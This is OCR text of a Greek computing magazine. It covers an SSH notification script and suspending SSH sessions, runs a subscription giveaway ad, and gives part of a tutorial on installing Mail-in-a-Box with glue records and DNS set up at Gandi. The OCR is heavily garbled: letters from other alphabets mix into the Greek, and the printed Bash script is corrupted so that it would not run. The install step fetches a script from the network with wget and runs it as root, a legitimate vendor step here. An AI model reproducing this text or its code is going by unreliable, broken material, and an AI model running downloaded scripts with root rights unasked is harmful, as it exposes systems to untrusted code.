στον κατάλογο bin. Ta ueyé8n %h και ?er αντικαθίστανται αυτόματα από το όνοµατου 
εκάστοτε server KL απὀ το όνοµα TOU User account στο απομακρυσμένο σύστημα. Τε- 
λικά, κάθε φορά που θα πραγματοποιείται µια σύνδεση SSH, θα εκτελείται αυτόμα- 
τα TO σκριπτάκι notify.sh µε παραμέτρους ro hostname rou server kat To username 
που χρησιμοποιήθηκε για τη σύνδεση. 
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To notify.sh σε δράση! Πραγματοποιώντας µια σύνδεση o' ένα μηχάνημα του τοπικού 
δικτύου, το σύστημα εμφάνισε αµέσως µια ωραιότατη ειδοποίηση. Παρεμπιπτόντως, 
σημειώστε ότι το Script που παρουσιάζουμε στο άρθρο δεν εμφανίζει ειδοποιήσεις 
για Τις συνδέσεις που πραγματοποιούνται χειροκίνητα, παρά µόνο για όσες 
εκτελούνται στο background. Ωστόσο για τις ανάγκες тпс... Φωτογράφησης, 
αναγκαστήκαµε va αντιστρέψουµε τη συμπεριφορά του ;) 


Νομίζουμε ότι o' αυτό το στάδιο έχετε καταλάβει πώς λειτουργεί το συστηµατάκι 
μας. To notify.sh αποτελεί éva script δικῆς µας κατασκευής, τα οποίο επιστρατεύει 
το πρόγραµµα notify-send για να εμφανίζει ειδοποιήσεις στην επιφάνεια εργασίας. 
Φυσικά, η εμφάνιση µιας ειδοποίησης για *ká8g* σύνδεση SSH θα ήταν περιττή και 
εκνευριστική. Επομένως, το notify.sh οφείλει να κάνει κάποιο φιλτράρισμα και να 
εμφανίζει ειδοποιήσεις рохо үа тс συνδέσεις που παρουσιάζουν ξεχωριστό ενδια- 
φέρον. Δείτε τη δική µας εκδοχή για ro script, για να πάρετε µια ιδέα: 
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#1 /bin/bash 

hostnamez$1; 

иѕегпате=$2; 

title-"SSH connection"; 

роду="А new connection to $hostname as $username has been established"; 
level-z"low"; 
iconz"/usr/share/icons/gnome/32x32/emblems/emblem-system.png"; 

[ ! $(tty -s) ] && notify-send -u "$level" -i "$icon" "$title" "$body"; 


Οπρογραµμματισμός үа TO κέλυφος BASH ξεφεύγει апо το σκοπό του άρθρου, όµως 
δεν θα δυσκολευτείτε va κατανοήσετε τι συμβαίνει. Οι μεταβλητές hostname και 
username παίρνουν τις τιμές τους από τις δύο παραμέτρους που παρέχονται στο 
script κατά την εκτέλεσή του (θυμηθείτε τα μεγέθη %h και %г, που επιστρατεύσα- 
µε στον ορισμό του LocalCommand, µέσα στο αρχείο ρυθμίσεων του SSH). Στη ou- 
νέχεια ορίζουµε τέσσερις ακόµα μεταβλητές, που αργότερα χρησιμοποιούνται ως 
παράµετροιγιατην εκτέλεση rou notify-send. Πιστεύουμε ότι η αποστολή καθεµίας 
апо αυτές εἶναι αυτονόητη. Θα σας προτείναµε ωστόσο να ρίξετε µια ματιά στο 
manual page rou notify-send, για να κατανοήσετε πλήρως τη λειτουργία rou. 


Ιδιαίτερο ενδιαφέρον παρουσιάζει η τελευταία γραµµή του κώδικα. Σκεφτείτε ότι 
TO notify.sh εκτελείται στο (Oto κέλυφος апо το οποίο πραγματοποιήθηκε και η 
αντίστοιχη σύνδεση SSH. Αν αυτό το κέλυφος εἰναι διαδραστικό (interactive), συμπε- 
ραίνουμε ότι η σύνδεση πραγματοποιήθηκε χειροκίνητα (δηλαδή artó το χρήστη). 
Αντίθετα, av το κέλυφος δεν είναι διαδραστικό (non-interactive), συμπεραίνουμε 
ότι η σύνδεση πραγματοποιήθηκε апо κάποιο script, στο υπόβαθρο. О Ελεγχος με 
τον οποίο ξεκινά η τελευταία γραµµή του κώδικα, τσεκάρει ακριβώς αυτό: Αν το 
notify.sh εκτελείται µέσα σε διαδραστικό κέλυφος ή όχι. Ουσιαστικά, ελέγχουμε 
αν η αντίστοιχη σύνδεση πραγματοποιήθηκε апо το χρήστη ή апо κάποιο script. O 
έλεγχος πραγματοποιείται τσεκάροντας την τιµή που επιστρέφει το πρόγραμμα tty 
(η παράμετρος -s εξασφαλίζει ότι δεν θα τυπωθεί κανένα μήνυμα). Αν αυτή η τιµή 
είναι μηδέν, το κέλυφος εἰναι non-interactive. Αν η τιµή εἶναι µη μηδενική, το κέλυ- 
φος εἰναι interactive. Παρατηρείστε ότι το αποτέλεσµα του σχετικού ελέγχου αντι- 
στρέφεται, µε τη χρήση του τελεστή ΝΟΤ (ο χαρακτήρας του θαυμαστικού). Τελικά, 
µε αυτό το κολπάκι εξασφαλίζουµε ότι θα εμφανίζονται ειδοποιήσεις µόνο για τις 
συνδέσεις που πραγματοποιούνται апо τα διάφορα scripts, στο background. Av το 
καλοσκεφτείτε, κάτι τέτοιο είναι απόλυτα λογικό. H εμφάνιση ειδοποιήσεων γιατις 
συνδέσεις που πραγματοποιούµε μόνοι µας θα ήταν περιττή και ενοχλητική. 


O κὠδικάς που γράψαµε για ro notify.sh απέχει апо το να εἶναι ολοκληρωμένος. Ka- 
ταρχάς, δεν πραγματοποιεί κανέναν ἐλεγχο για το πλήθος των παραμέτρων, ούτε 
τσεκάρει για την ύπαρξη rou notify-send. Εξάλλου, θα μπορούσε να πραγματοποιεί 
και πιο ἐξυπνους ελέγχους (π.χ., σε ποιο µηχάνηµα έγινε η σύνδεση kat µε ποιον 
λογαριασμό), WOTE να εμφανίζει πιο εὐστοχες και κατατοπιστικές ειδοποιήσεις. lE- 
νικότερα, ο κώδικας για ro notify.sh είναι γραμμένος πρόχειρα και δεν θα πρέπει va 
τον χρησιμοποιήσετε ως έχει. 
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Προσωρινή διακοπή 


Πα то τέλος αφήσαμε κάτι εξαιρετικά απλό (και ταιριαστό). Μετά апо ra περίπλοκα 
σενάρια δικτύωσης που μελετήσαμε, θυµηθήκαµε κάτι πεζό: Πώς μπορούμε va us- 
ταφέρουµε µια σύνδεση SSH στο υπόβαθρο, ὥστε va ελευθερώσουμε την κονσόλα 
καινατην χρησιμοποιήσουμε για κάποια άλλη εργασία; Όπως θαγνωρίζετε, κάτι TÉ- 
TOLO επιτυγχάνεται µε то πάτηµα του συνδυασμού [C TRL+Z]. Με αυτόν τον τρόπο, το 
πρόγραμμαπου εκτελούμε μεταφέρεται στο υπόβαθρο και ηλειτουργίατουτίθεται 
σε αναστολή. Όταν θελήσουμε να επαναφέρουµε στο προσκήνιο το συγκεκριµένο 
πρόγραμμα, αρκεί να εκτελέσουµε την εντολή fg (από το foreground). Πολύ απλό, 
έτσι δεν είναι; Μόνο που av το δοκιμάσετε µέσα σε µια σύνδεση SSH, θα διαπιστώ- 
σετε ότι δεν έχει το αναμενόμενο αποτέλεσμα. Το πάτημα των πλήκτρων, βλέπε- 
τε, θα προωθηθεί στο απομακρυσμένο μηχάνημα και δεν θα ληφθεί υπόψη апо την 
κονσόλα του δικού µας μηχανήματος. Πα va µη συμβεί αυτή η προώθηση, πρέπει 
να εισάγουµε µια αλληλουχία χαρακτήρων που πετυχαίνει το λεγόμενο escaping. 
Συγκεκριµένα, πρέπει να πατήσουµε το πλήκτρο [ENTER] κι αμέσως μετά ro xapa- 
κτήρα tilde (την περισπωμένη). Κάνοντας κάτι τέτοιο, θα παρατηρήσετε ότι δεν θα 
εμφανιστεί τίποτα στην οθόνη. Το SSH, όµως, θα έχει λάβει το μήνυμα κι οτιδήπο- 
τε πληκτρολογήσουμε αµέσως µετά, θα µεταβιβαστεί στην κονσόλα του δικού µας 
συστήµατος. Με λίγα λόγια, για την αναστολή µιας σύνδεσης SSH και τη µεταφορά 
της στο υπόβαθρο, πρέπει να πατήσουµε το πλήκτρο [ENTER], αμέσως μετά rov 
χαρακτήρα tilde και στη συνέχεια το συνδυασμό πλήκτρων [CTRL+Z]. 


Πλέον, εκτός апо τα διάφορα κόλπα για το χειρισμό των συνδέσεων SSH, γνωρί- 
ÇETE και το πώς να τις αναστέλλετε. Πιστεύουμε ότι κάπου εδὠ η αποστολή µας 
ολοκληρώθηκε — ñ τουλάχιστον ολοκληρώθηκε προς το παρόν. 
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Αυτό To Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό ro Mac mini δεν &tvat ro βασικό μοντέλο, και κοστίζει 1249 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό ro Mac mini то κληρώνουμε μεταξύ 25 αναγνωστών ue Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδρομή σας πλησιάζει στη λήξη της, αυτό ro Mac mini εἶναι 
εξαιρετικά πιθανό να γίνει δικό σας. 


fia va πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας ото 
http://deltahacker.gr/pdf120rder/ss2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
µε Jumbo-Pack Plus χρειαζόμαστε ακόµα, ώστε να προχωρήσουμε 
στην κλήρωση. 


Προσέξτε: Av και θα περιμένουμε όσο χρειαστεί για να έχουµε 25 
συνδρομητές µε Jumbo-Pack Plus και να τους κληρώσουµε ro Мас 
mini, αυτό δεν σημαίνει ότι δεν μπορούμε να κάνουμε κάτι για va επι- 
σπεύσουµε τη διαδικασία. Κάντε αυτό που πρέπει, συμπληρώνοντας 
τη φόρμα παραγγελίας: http://deltahacker.gr/pdf120rder/sts2 


Καλή σας επιτυχία! 


Skill: Intermediate 
Tags: mailserver, glue records, DNSSEC, SSL/TLS certificates, Certificate Signing Request 


Εγκατάσταση και 
βασική ρύθμιση 
Mail-in-a-Box 


Στα δύο προηγούμενα άρθρα της σειράς για τη δηµιουργία του δικού µας 
mailserver, ξεκινήσαμε µε µια συζήτηση γύρω апо την περιπλοκότητα ενός 
τέτοιου εγχειρήματος. Ουσιαστικά, αυτό που θέλαμε ήταν να διώξουµε τις 

αμφιβολίες από τους διστακτικούς και, όταν υποψιαστήκαμµε ότι µε αρκετούς 
το καταφέραμε, αµέσως πιάσαµε δουλειά φροντίζοντας για την κατάλληλη 
υποδομή του mailserver. >' αυτό το τρίτο µέρος rou αφιερώματός µας 
ασχολούμαστε µε την εγκατάσταση και τη ρύθμισή του. 


του Χρήστου Βαρελά 


Όπως προαναγγείλαµε ήδη апо το πρώτο άρθρο της σειράς, προκειµένου να µην 
πελαγώσουμε στρεφόμαστε στο εγχείρημα rou Mail-in-a-Box, στο εξής MiaB. Συγκε- 
κριμένα, στο παρόν άρθρο ασχολούμαστε µε: 

* TQ glue records του nameserver που δημιουργεί ro MiaB 

* Th βασική εγκατάσταση rou MiaB 

* TQ DNS Security Extensions 

* TQ απαραίτητα πιστοποιητικά SSL 


Τις έννοιες που είναι νέες ñ τέλος πάντων κρίνουμε ότι χρήζουν µιας κάποιας προ- 
σοχής, θατις ορίζουμε κατά την πρώτη τους αναφορά. 


Ta glue records για τον nameserver µας 


Mía από τις παράπλευρες θετικές συνέπειες rou MiaB εἶναι ότι, αµέσως µετά την 
εγκατάστασή rou, αποκτάµε και τον δικό µας DNS server στο cloud — συγκεκριµένα 
στο (Oto VPS που λειτουργεί και το MiaB. Το καλό μ' αυτή την προσέγγιση εἶναι ότι 
ορίζονται αυτόματα (και σωστά) όλα τα απαραίτητα DNS records (МХ, SPF, DKIM, 
DMARO), ώστε ο mailserver µας να είναι πλήρως λειτουργικός, ασφαλής καιοι άλλοι 
mailservers va τον εμπιστεύονται. 


Πώς όµως φτάνει κανείς στον nameserver για ro domain µας, το οποίο εν προκειμέ- 
vw είναι το colder.xyz; Το σκηνικό, λίγο µετά την εγκατάσταση και ρύθμιση του DNS 
από πλευράς MiaB, έχει ως εξής: 
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* Qç nameservers για το domain είναι ορισμένα τα nsT.box.colder.xyz και ns2.box. 
colder.xyz 


* Κάποια στιγµή, éva µηχάνηµα ρωτάει: Ποιος είναι o nameserver για ro colder.xyz; 


* Με την προὐπόθεση ότι στον domain registrar έχουµε δώσει τα ονόματα των 
nameservers του domain (nsl.box.colder.xyz και ns2.box.colder.xyz), η απάντηση 
που παίρνει εἶναι: To nsT.box.colder.xyz είναι ένας nameserver που θέλεις. 


* To μηχάνημα που απηύθυνε την προηγούµενη ερώτηση, λέει: Θεσπέσια! Και 
ποια είναι η αριθµητική διεύθυνση IP του ns1.box.colder.xyz; 


* Ἡ απάντηση εἶναι μάλλον αποκαρδιωτική: Ιδέα δεν έχω — δοκίµασε να βρεις τους 
nameservers για ro colder.xyz. 


Από τα τρία τελευταία bullets εἶναι προφανές ότι πέφτουµε σε έναν ατέλειωτο 
βρόγχο κι άκρη δεν βγαίνει. Προκειμένου να αποφεύγεται αυτή η κατάσταση, χρει- 
άζεται να έχουν οριστεί τα λεγόμενα glue records. Ένα glue record δεν είναι τίπο- 
τε άλλο από τη διεύθυνση IP ενός nameserver και ορίζεται µέσα апо τον registrar. 
Γενικά, τα glue records πρέπει να καθορίζονται κάθε φορά που ως nameserver για 
éva domain επιθυμούμε va χρίσουµε κάποιο µηχάνηµα *evróc* rou ίδιου domain -- ή 
Ἀκάτω3 апо ro domain, αν προτιμάτε. Anag κι έχουµε ορίσει τα απαιτούμενα glue 
records, τότε ένας διάλογος για την αναζήτηση nameserver για το domain εξελίσσε- 
ται κάπως έτσι: 


* Αχµ,ποιος εἶναι o nameserver για ro colder.xyz; 

* Ένας ωραιότατος nameserver για ro colder.xyz είναι ro nsT.box.colder.xyz. 

* Ναι πράγματι, ωραίος φαίνεται. Μήπως έχεις και τη διεύθυνση IP του μορφονιού; 
* Ἀκουλέει! Και βέβαια την έχω - και είναι η 46.101.173.140. 


Από τα screenshots και τις περιγραφές που ακολουθούν, φαίνεται πως ορίσαµε τα 
glue records για ro colder.xyz µέσα από το περιβάλλον του Gandi.net (ο registrar στον 
οποίο καταφύγαμε για την κατοχύρωση rou colder.zyz). 


Register a server with the registry 


4 


Name |ns1.box -colder.xyz 
— 


IPaddress |46.101.173.140 


»a ТВ 


Προκειμένου va ορίσουμε glue records ото Gandi συνδεόµαστε πρώτα OTO 
λογαριασμό µας, δίνουμε Services > Domains και κάνουμε ένα κλικ πάνω 
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στο domain που µας ενδιαφέρει (για το παράδειγμά µας εἰναι ro colder. 
xyz). Στη νέα σελίδα που εμφανίζεται κάνουμε άλλο ένα κλικ στο Glue 
record management, ro οποίο είναι κάτω απὀ την ενότητα Name servers, 
στα δεξιά της σελίδας "Domain Names > colder.xyz". Εστιάζουµε την TPO- 
σοχή µας στην περιοχή Register a server with the registry. Στη θυρίδα Name 
γράφουμε "п51.бох" (χωρίς τα εισαγωγικά) και, όπως βλέπετε, ro Gandi 
έχει ήδη συμπληρωμένο то ὀνοματου domain µας (colder.xyz). ro πλαίσιο 
IP address, апо κάτω, συμπληρώνουμε τη διεύθυνση IP του VPS στο οποίο 
θα εγκατασταθεί ro MiaB. Πατάµε πάνω στο κουμπάκι Validate (κάτω από 
το πλαίσιο IP address και δεξιά) κι έτσι ορίζουμε τον nameserver µε буора 
nsl.box.colder.xyz και διεύθυνση IP την 46.101.173.140. Φυσικά, εσείς Ва 
βάλετε το IP του δικού σας VPS. Επαναλαμβάνουµμε шоте να ορίσουμε 
τον mailserver µε буора ns2.box.colder.xyz, ο οποίος έχει την ίδια διεύθυν- 
ση ΙΡ (πρόκειται για τον (Oto server). 


colderxxyz - Glue record / h., X 
ФӘ Gandi SAS (FR) https//www.gandi.net/admin/domain/hosts/5644172, 


Christos Varelas (С) 


Š gandi.net 


Services Account management Billing Orders in progress ἕ gandi.net 


Domains 551 Simple Hosting 


Domain Names » colder.xyz - Glue record management 


This interface allows you to manage nameservers you set up for a domain registered at Gandi, and to designate them as 
nameservers at the domain's corresponding registry using glue records. 


You may create new nameserver glue records and delete or update the IP addresses of existing server records. 


WARNING: This interface is for experienced users only. Incorrect entries will lead to interruptions in the domain's 
services (websites, e-mail, etc.). 


In particular, if you want to change your URL forwarding address or add the DNS of your web host, this is NOT the 


interface you should be using. If you are not sure you understand the purpose of glue records as described here, you 
probably don't need to use this screen. 


Searcn 


Nameserver (2/2) IP address 
ns1.box.colder.xyz 46.101.173.140 


ns2.box.colder.xyz 46.101.173.140 


10 per page | 


Ιδού ot δύο nameservers για ro domain µας (colder.xyz). Είναι ot ns1.box. 
colder.xyz kat ns2.box.colder.xyz και ουσιαστικά πρόκειται για το (Oto un- 
χάνημα, µε διεύθυνση 46.101.173.140. 
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Domain Names colderay.. x Wi 


Ф а Gandi SAS (FR) | http dmin/domain/dns/5644172 з паз п 0 5 4 е 


Š gandi.net 


Services Account management Billing Orders in progress Messages ἕ gandi.net. 


Domains 551 Simple Hosting 


Domain Names » colder.xyz - update DNS n. 


Indicate the DNS servers you want to apply to this domain name. Name servers are machines which direct your visitors to 
the correct website, and direct email to the correct mail servers. 

DNS1* ínsiboxcolderxyz 

DNS2  [ns2boxcolderxyz 

DNS3 


DNS4 


Οφείλουµε στη συνέχεια να αλλάξουμε τους nameservers για ro domain 
μας και va υποδείξουµε αυτούς που μόλις ορίσαµε (δηλαδή τους п1.рох. 
colder.xyz και ns2.box.colder.xyz). Στο site του Gandi, ακολουθούμε τη óc 
αδρομή Services > Domains  colder.xyz ^ Modify server. Στη σελίδα µε 
όνομα "Domain Names > colder.xyz - update DNS", διαγράφουμε та ονόματα 
των nameservers που είναι ήδη συμπληρωμέναστις θυρίδες DNST, DNS2, 
DNSS3 και DNSA. Στις 0351 kat DNS2 πληκτρολογούμε nsl.box.colder.xyz 
και ns2.box.colder.xyz αντίστοιχα. Πατάµε πάνω oro κουμπάκι Submit, 
κάτω δεξιά, και είμαστε έτοιμοι. 


назна) 


*ú ++ m Ф 48 


paid account total: 1,93 € Logout 


Š gandi.net 


Services Account management Billing Orders in progress Messages ἕ gandi.net 


Domains 


Domains | Domain names | 18 DNSZones(1) "M Mail packs (0) — € Operations (0) Buy a 


Search Ө οκ = Advanced search Export 
(= Domain name (1/1) Rights Expiration A DNS Services $ 
| colderxyz OATB 19/05/0169 © External DNS € 


10 per page |= KS 


Αν όλα έχουν γίνει σωστά, τότε στη σελίδα µε ra domains µας -και συ- 
γκεκριµένα στη γραμμή µε το colder.xyz-, κάτω апо ro DNS θα πρέπει να 
γράφει "External DNS". 
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H αυτοματοποιημένη εγκατάσταση του MiaB 


Πα την εγκατάσταση του MiaB αρκεί va τρέξουµε ένα μόνο script. Ουσιαστικά, αυτό 
θα κατεβάσει όλα ra απαιτούμενα πακέτα апо ra αποθετήρια rou Ubuntu και, το on- 
μαντικότερο, θα πραγματοποιήσει ὀλες τις απαραίτητες ρυθμίσεις ώστε mailserver 
και DNS server να λειτουργούν σωστά. Αφού συνδεθούμε μέσω SSH στη γραμμή 
εντολών TOU VPS µας, λαμβάνουμε και τρέχουμε ro script κάπως έτσι: 


$ e = 

$ wget https://mailinabox.email/bootstrap.sh 
$ chmod 755 bootstrap.sh 

$ sudo -/bootstrap.sh 


Στα screenshots και στις περιγραφές που ακολουθούν, δείτε τι θα σας περιμένει 
κατά την εκτέλεση TOU Script. 


Mail-in-a-Box Installation 
Hello and thanks for deploying a Mail-in-a-Box* 


I'm going to ask you a feu questions. 


To change your answers later, just run 'sudo mailinabox' 


from the command line. 


Κατά τη διαδικασία εγκατάστασης rou MiaB καλούμαστε va απαντήσουμε σε µερι- 
кес απλές ερωτήσεις. Όπως βλέπετε και στο screenshot, αν αργότερα χρειαστεί 
у αλλάξουμε κάτι θα δώσουμε "sudo mailinabox". Το πιθανότερο πάντως είναι πως 
δεν θατρέξουµε ξανά το συγκεκριµένο εργαλείο. 


Your Email fiddress 
What email address are you setting this box up to manage? 


The part after the 8-sign must be a domain name or subdomain that you control. You 
can add other email addresses to this box later (including email addresses on other 
domain names or subdomains you control). 


We've guessed an email address. Backspace it and type in what you really want. 


Enail fiddress: 
talkZusecolder.xuz 


<Сапсе1> 


Πληκτρολογούμε την ηλεκτρονική διεύθυνση που επιθυμούμε να έχει o διαχειριστής 
του email για το domain. Το δικό µας domain είναι το colder.xyz και θέλαμε ο διαχειρι- 
στής να έχει username το talk2us (η συνήθεια апо ra deltahacker.gr και parabing.com, 
βλέπετε). Μετά την εγκατάσταση, апо ro (web) control panel που παρέχει ro MiaB έχου- 
HE TN δυνατότητα ναπροσθέτουµε rj va αφαιρούμε κι άλλες ηλεκτρονικές διευθύνσεις. 
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Hostname 
This box needs a nane, called a 'hostname'. The name will form a part of the box's web 
address. 


Ше recommend that the name be a subdomain of the domain in your email address, so ue're 
suggesting box.colder.xuz. 


You can change it, but ue recommend you don't. 


Hostname : P 


[box .colder.xuz 


«Cancel» 


Εδω δίνουμε το όνομα του συστήµατος στο οποίο τρέχει ro Міав. Πρέπει να είναι 
της µορφής box.ro-domain.uac, επομένως εμείς γράψαμε box.colder.xyz. 


Country Code 
Choose the country where you liue or uhere your organization 
is based. 


(This is used to create an SSL certificate.) 


Country Code: 
Τί-) 

GE Georgia 

GF French Guiana 

GG Guernsey 

GH Ghana 

GI Gibraltar 

GL Greenland 
Ganbia 
Guinea 
Guadeloupe 
Equatorial Guinea 
South Georgia and the South Sandwich Islands 
Guatemala 
Guam 
Guinea-Bissau 
Guyana 
Hong Kong 
Heard Island and McDonald Islands 
Honduras 
Croatia 
Haiti 
Hungary 


«Cancel» 


Επιλέγουμε τη χώρα στην οποία βρισκόμαστε. Δεν το κάνουμε για rov ορισμό της 
ζώνης ώρας αλλά για την παραγωγή του πιστοποιητικού SSL που θα χρησιµοποιεί- 
ται για rov nginx, το Dovecot και ro postfix. 
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already instal 
installing nsd ldnsutils 
Generating DNSSEC signing keys. This may take a feu ninutes. 

already installed: ca-certif icates (20141019ubuntu0.14.04. D 

installing postfix postfix-pcre postgrey . 

installing dovecot-core dovecot-imapd dovecot- pop3d douecot-Imtpd dovecot-sqlite sqlite3 dovecot-sie 
ve dovecot-nanagesieved ... 

Creating neu user database: /home/user-data/mail^/users.sqlite 

installing opendkim opendkim-tools opendnarc ... 

installing spampd razor ругог dovecot-antispam ... 

installing nginx php5-fpm ... 

already installed: php5-json (1.3.2-2build1), phpS5-common (5.5.9«dfsg-lubuntu4.9), 
-Zubuntu3.3) 

installing dbconfig-conmon php5 php5-sqlite рһр5-псгурё php5-intl php-auth php-net-smtp php-net-sock 
et php-net-sieve php-mail-mime php-crypt-gpg php5-gd php5-pspell tinymce libjs-jquery libjs- jquery-m 
ouseuheel ... 

installing Roundcube uebmail 1.1.1 

already installed: dbconfig-common (1.8.47+пти1), php5-cli (5.5.9«dfsg-lubuntu4.9), php5-sqlite (5.5 
.S«dfsg-iubuntu4.9), php5-gd (5.5.9«dfsg-iubuntu4.9), php5-imap (5.4.6-Oubuntu5), php-pear (5.5.9«df 
sg-iubuntu4.9), curl (7.35.0-1ubumtu2.5), php5 (5.5.9«dfsg-lubuntu4.9), php5-gd (5.5.9«dfsg-1ubuntu4 
.9), php5-fpn (5.5.9«dfsg-1ubuntu4.9) 

installing php5-curl php-apc libapri libtool libcurl4-openssl-deu php-xnl-parser php5-dev memcached 
php5-nemcache unzip ... 

installing ounCloud... 

creating sqlite db 

already installed: рһр-ѕоар (0.13.0-1), 
installing libaul-php php5-xsl ... 


pi-2Zubuntu2) 


libmagici (1:5.14 


php5-imap (5.4.6-0ubuntu5) 


installing z-push (fmbiete fork)... 

installing python3-f lask links duplicity libyaml-deu python3-dnspython pyuthon3-dateutil ... 
Waiting for the Mail-in-a-Box management daemon to start... 

updated DNS: box.colder.xuz 

ueb updated 


Okay. I'm about to set up talkZusScolder.xyz for you. This account will also 


have access to the box's control panel. 
passuord : 


can confirm the 


VHAGKER 


To script εγκατάστα- 
σης rou MiaB 8a φέρει 
και θα εγκαταστήσει 
όλα τα απαραίτητα 
για τη λειτουργία του 
mailserver πακότα, 
από τα repositories 
TOU Ubuntu. Όταν τε- 
λειώσει µε τις εγκα- 
ταστάσεις, θα µας 
ζητήσει password για 
το λογαριασμό emai 
του διαχειριστή (για 
εμάς, talk2us(gcolder. 
xyz). Mg το email κα 
TO password του Ot 
αχειριστή κάνουμε 
login στο webmail του 
mailserver µας, αλλά 
και στο control pane 
διαχείρισης. 


To script εγκατάστα- 


σης έχει τελειώσει 
και, όπως βλέπετε, 
έχει δημιουργήσει 


και μερικά απαραίτη- 
τα mail aliases. Στη 
συνέχεια θα συνδε- 
θούμε στο control 
panel του mailserver 
μας - µε τη βοήθεια 
του web browser της 
επιλογής µας φυσικά. 
O nameserver του box 
δεν εἶναι ακόµα opa- 
τός για τον υπόλοιπο 
κόσμο, επομένως στη 
μπάρα διευθύνσεων 
του web browser θα 
πληκτρολογήσουμε 
τη διεύθυνση που µας 
υποδεικνύει TO script 


εγκατάστασης. Για εμάς αυτή η διεύθυνση ήταν η https://46.101.173.140/admin, όπου то 
46101173140 είναι η δημόσια διεύθυνση IP του VPS. Παρατηρήστε εξάλλου ότι, σ αυτό 
το στάδιο, το πιστοποιητικό του web server είναι self-signed. Συνεπώς, o web browser 
δικαιολογημένα θα γκρινιάξει. Αν θέλουμε να είμαστε έξτρα προσεκτικοί -KAL κάπως 
υπερβολικά σχολαστικοί-, πριν πούμε στον browser να δεχθεί το πιστοποιητικό θα δού- 
µε ro fingerprint που διαθέτει και θα το συγκρίνουμε p' εκείνο που έχει εμφανίσει το 


script εγκατάστασης στο τερματικό. 
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4. Untrusted Connection 


€ @ ntps//46101173140/2dmin. Search пе + f ὦ $ 49 


This Connection is Untrusted 


You have asked Firefox to connect securely to 46.101.173.140, but we can't confirm that your 
connection is secure. 


Normally, when you try to connect securely, sites will present trusted identification to prove that you 
are going to the right place. However, this site's identity can't be verified. 


What Should I Do? 


If you usually connect to this site without problems, this error could mean that someone is trying to 
impersonate the site, and you shouldn't continue. 


Technical Details 
IUnderstand the Risks 


If you understand what's going оп, you can tell Firefox to start trusting this site's identification. Even if 
you trust the site, this error could mean that someone is ing wi: j 


Don't add an exception unless you know there's a good reason why this site doesn't use trusted 
identification. 


Add Exception - L. 
k 


Πρώτη απόπειρα σύνδεσης oro (web) control panel rou MiaB κι o browser δικαίως πα- 
ραπονιέται, αφού TO πιστοποιητικό που του στέλνει ο αποµακρυσμένος web server 
είναι self-signed. Σε λίγο θα αποκτήσουμε ένα κανονικό, έγκυρο πιστοποιητικό για TO 
MiaB. Προς το παρόν πάντως μπορούμε να κάνουμε µια εξαίρεση (κλικ ото κουμπί Add 
Exception) και να πούμε στον Firefox να δεχτεί αυτό που βλέπει. 


box.colderayz - Май-іп-а-Вох.. Ж 


€ ὢ https//46.101173140/admin 


box.colder.xyz 


Log in here for your Mail-in-a-Box control panel 


Email talk2ous@colder xyz 


Password 00060, 


E Remember те 


Sign in P 


This is a Mail-in-a-Box. 


Πα τη σύνδεση oro control panel του MiaB χρειάζεται να δώσουμε ro email του Ota- 
χειριστή (για εμάς είναι ro talk2us(Qcolder.xyz), βεβαίως και το αντίστοιχο password. 
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box.colderxyz - Mail-in-a-Box.. X 


€ ὢ https//46.101173.140/3dmin 


System Status Checks 


System 

All system services are running. 

SSH disallows password-based login. 

System software is up to date. 

System administrator address exists as a mail alias. [administrator()box colder хуг ~ talk2us(icolder xyz] 


The disk has 21.8 GB space remaining. 


Network 


Outbound mail (SMTP port 25) is not blocked. 


IP address is not blacklisted by zen.spamhaus.org. 


box.colder.xyz 

Nameserver glue records are correct at registrar. [ns1/ns2.box colder xyz — 46.101.173.140] 

Domain resolves to box's IP address. [box colder xyz — 46.101.173.140] 

Reverse DNS is set correctly at ISP. [46.101.173.140 — box colder xyz] 

The DANE TLSA record for incoming mail is correct ( 25. tcp.box colder xyz). 

Hostmaster contact address exists as a mail alias. [nostmaster@box colder xyz = administrator)box colder xyz] 
Domain's email is directed to this domain. [box colder xyz — 10 box colder xyz] 

Postmaster contact address exists as a mail alias. [postmaster@box colder xyz ~ administrator@box.colder xyz] 


Domain is not blacklisted by dbl.spamhaus.org. 


Μετά апо την πρώτη επιτυχή σύνδεση oro control panel rou MiaB, διεξάγεται éva 
πλήθος ελέγχων και τα αποτελέσματα των επιµέρους δοκιμών παρουσιάζονται 
σε µια απλή και όμορφη σελίδα. Όπως µπορείτε να δείτε, όλα «δείχνουν: να είναι 
µια χαρά (έµφαση ото “δείχνουν” και θα πούμε σε λίγο γιατί). Па παράδειγµα: 

* όλες οι απαραίτητες υπηρεσίες rou server µας είναι ενεργές 

* απαγορεύονται τα SSH logins µε πληκτρολόγηση password 

* τολογισµικό είναι πλήρως ενημερωμένο 

* η διεύθυνση του διαχειριστή συστήµατος, η οποία είναι administrator(mbox. 

colder.xyz, υπάρχει ως alias της talk2us(Qcolder.xyz 
* οδιαθέσιµος αποθηκευτικός χώρος είναι υπεραρκετός 


* TO port 25/TCP δεν είναι μπλοκαρισμένο (όπως πιθανώς θα συνέβαινε αν 
είχαμε εγκαταστήσει ro MiaB σε server/VM στο σπίτι) 


* ηδιεύθυνση IP του server δεν βρίσκεται σε blacklist από το zen.spamhaus.org 


* TQ glue records έχουν τεθεί σωστά στον registrar (Gandi) (οι ρυθµίσεις που 
αφορούν στο DNS χρειάζονται κάποια ώρα για να διαδοθούν, αλλά στην 
πλειονότητα των περιπτώσεων όλα θα εἰναι καλά µέσα σε 30 λεπτά) 


* TO box.colder.xyz αντιστοιχεί oro IP του VPS 
* то reverse DNS έχει τεθεί σωστά апо rov ISP (DigitalOcean) κ.ο.κ. 


Σκρολάροντας όµως λίγο τη σελίδα, βλέπουμε γιατί δώσαμε έµφαση o' αυτό ro 
"δείχνουν". 
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box.colderxyz - Май-іп-а-Вох.. X 
€ ὢ https://46.101.173.140/admin 
Log out? 
The DANE TLSA record for incoming mail is correct ( 25. їср рох colder xyz). 
Hostmaster contact address exists as a mail alias. [nostmaster(gbox colder хуг ~ administrator(àbox.colder xyz] 
Domain's email is directed to this domain. [box.colder.xyz ~ 10 box colder xyz] 
